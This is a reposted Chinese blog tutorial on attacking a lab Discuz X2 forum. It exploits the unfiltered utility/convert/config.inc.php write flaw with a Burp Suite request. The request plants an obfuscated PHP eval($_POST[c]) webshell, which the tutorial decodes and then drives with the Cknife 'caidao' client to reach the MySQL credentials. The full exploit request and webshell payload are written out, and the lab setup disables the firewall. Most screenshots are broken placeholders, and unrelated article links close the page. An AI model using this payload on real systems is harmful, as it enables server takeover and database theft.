菜刀渗透-白红宇

菜刀渗透

阅读量：3944 次

发布时间：2019-05-24

本文共 2418 字，大约阅读时间需要 8 分钟。

快速搭建discuz论坛

使用kali下BurpSuite对discuz后台注入php木马

使用Cknife“菜刀”.上传webshell木马到网站

使用Webshell查看mysql数据库密码并盗取数据库

快速搭建discuz论坛

攻击思路

想要拿下一台主机A的权限：

1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞

2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权

3、传上去后,得到apache用户普通权限,再提权成root

快速构建实验环境

搭建一个LAMP环境,部署带有漏洞的discuz论坛

1、漏洞概述:

这漏洞出现在一个DZ X系列自带的转换工具里面

漏洞路径：utility/convert/data/config.inc.php

漏洞发生的原因是: config.inc.php这个文件在黑客通过post写入时,无任何过滤检测,所以黑客可以通过past方式往confiq.inc. php由写木马程序

触发漏洞过程：

1、在浏览器中访问打开http://192.168.138.146/utility/convert/index.php

2、使用/utility/convert/index.php 进行版本转换时,会自动创建utility/convert/data/config.inc.php文件

3、config.inc.php文件没有做过滤,黑客可以使用post方法对config.inc.php注入木马程序

渗透思路：

在centos7虚拟机xuegod63.上搭建LAMP环境

yum -y install mariadb-server mariadb httpd php php-mysql     # 安装LAMP环境systemctl start httpdsystemctl start mariadbmysqladmin -u root password '123456'mysql -uroot -p123456MariaDB [(none)]>

unzip Discuz_X2_SC_UTF8.zipmv upload/* /var/www/html/mv utility/ /var/www/html/

cd /var/www/html/chown -R apache:apache uc_server/ data/ config/ uc_client/chown -R apache:apache utility/convert/data/iptables -F  # 清空防火墙

浏览器输入http://192.168.138.146安装配置discuz论坛

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HF2sgyF9-1585301236417)(C:\Users\Jsck\Desktop\kali渗透\菜刀1.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8dNfCM1-1585301236418)(C:\Users\Jsck\Desktop\kali渗透\菜刀2.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4t8is6cI-1585301236419)(C:\Users\Jsck\Desktop\kali渗透\菜刀3.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UxqjvJ0x-1585301236420)(C:\Users\Jsck\Desktop\kali渗透\菜刀4.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kuJLRNeq-1585301236420)(C:\Users\Jsck\Desktop\kali渗透\菜刀5.png)]$

使用kali 下BurpSuite对discuz后台注入php木马

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S4DsF8iW-1585301236421)(C:\Users\Jsck\Desktop\kali渗透\菜刀6.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L9g62mGn-1585301236422)(C:\Users\Jsck\Desktop\kali渗透\菜刀7.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5QbaYaeO-1585301236422)(C:\Users\Jsck\Desktop\kali渗透\菜刀8.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x0ipIk1p-1585301236423)(C:\Users\Jsck\Desktop\kali渗透\菜刀9.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gUPcx44Y-1585301236423)(C:\Users\Jsck\Desktop\kali渗透\菜刀10.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ekvOtwGI-1585301236424)(C:\Users\Jsck\Desktop\kali渗透\菜刀11.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qJTBECEv-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀12.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NCsdL72S-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀13.png)]$

在浏览IP://utility/convert/

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vpitzG3H-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀14.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w5ljd2Xl-1585301236426)(C:\Users\Jsck\Desktop\kali渗透\菜刀15.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oxvFY8Oq-1585301236426)(C:\Users\Jsck\Desktop\kali渗透\菜刀16.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D0FDjPFD-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀17.png)]$

请求断开

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sgt5QRcE-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀18.png)]$

回到burpsuite查看截取到浏览器数据包:如果之前抓取到了别的数据包,需要先点击forward按钮,把之前的http请求都放行了,然后再访问我们需要访问的链接

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-g0uLXu95-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀19.png)]$

右键点击空白处,选择sendto repeater, repeater [ru I pi:ta®]中继器

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LcX9zmq8-1585301236428)(C:\Users\Jsck\Desktop\kali渗透\菜刀20.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FY6xnLbW-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀21.png)]$

删掉

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uyi2Y9K8-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀22.png)]$

修改第一行：

GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

为：注意 POST 后面没有回车，这里是文本显示自劢换行了。

POST

/utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes HTTP/1.1

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YiASO0rv-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀23.png)]$

注：这是一个 php 一句话木马加密后的内容。翻译后的内容为：

POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval("$_POST[c];");//]=aaaa&submit=yes

再转换%0a%0d 代表回车换行

POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaaeval("$_POST[c];")😉;

扩展 eval()凼数：

eval()凼数中的 eval 是 evaluate 的简称，这个凼数的作用就是把一段字符串当作 PHP 语句来执行，

一般情况下丌建议使用容易被黑客利用,evaluate [ɪvæljueɪt] 评价

eval(“echo’hello world’;”); 等同于下边的代码：

echo"hello world"; 在浏览器中都输出：hello world

修改完成后发送数据包

登录 CentOS 上，查看刚通过该漏洞注入的文件：

cd /var/www/html/utility/convert/data/vim config.inc.php

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EYSMpoau-1585301236430)(C:\Users\Jsck\Desktop\kali渗透\菜刀24.png)]$

使用 Cknife“菜函”上传 webshell 木马到网站

搭建 java 环境

yum -y install javajava -versionjava -jar Cknife.jar

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KGKBXzTm-1585301236430)(C:\Users\Jsck\Desktop\kali渗透\菜刀25.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UQ4nSEeT-1585301236431)(C:\Users\Jsck\Desktop\kali渗透\菜刀26.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-99hNMPBk-1585301236432)(C:\Users\Jsck\Desktop\kali渗透\菜刀27.png)]$

http://192.168.138.149/utility/convert/data/config.inc.php

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tJKTO34l-1585301236433)(C:\Users\Jsck\Desktop\kali渗透\菜刀28.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8IeGykNj-1585301236433)(C:\Users\Jsck\Desktop\kali渗透\菜刀29.png)]$

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gz43Q7wF-1585301236434)(C:\Users\Jsck\Desktop\kali渗透\菜刀30.png)]$

转载地址：http://eqnwi.baihongyu.com/

你可能感兴趣的文章

SequoiaDB湖仓一体架构亮相 ACM SIGMOD 2021

查看>>

信通院发布第十二批大数据产品能力评测结果，巨杉数据库两款产品通过

查看>>

巨杉数据库荣获2020年度河南省科学技术进步奖

查看>>

湖仓一体提升管理效率培育数据沃土

查看>>

报名启动！巨杉数据库 2021 湖仓一体技术大赛带你进入分布式技术的星辰大海

查看>>

H2数据库用户自定义函数方法及范例

查看>>

关于系统中使用多个PropertyPlaceholderConfigurer的配置

Jetty嵌入式服务器的JNDI快速配置指南

查看>>

夜, 北京

查看>>

图示ExtJS商业智能的仪表盘配置系统 - (Season 1)

查看>>

MAC 显示隐藏文件的方法

查看>>

Ext.Ajax教程，及Get和Post请求的使用拾遗

扩展Spring Security-用户密码自定义加密的快速实现

查看>>

Log4j异步日志简明配制

查看>>

扩展Spring Security-国际化终极配制

查看>>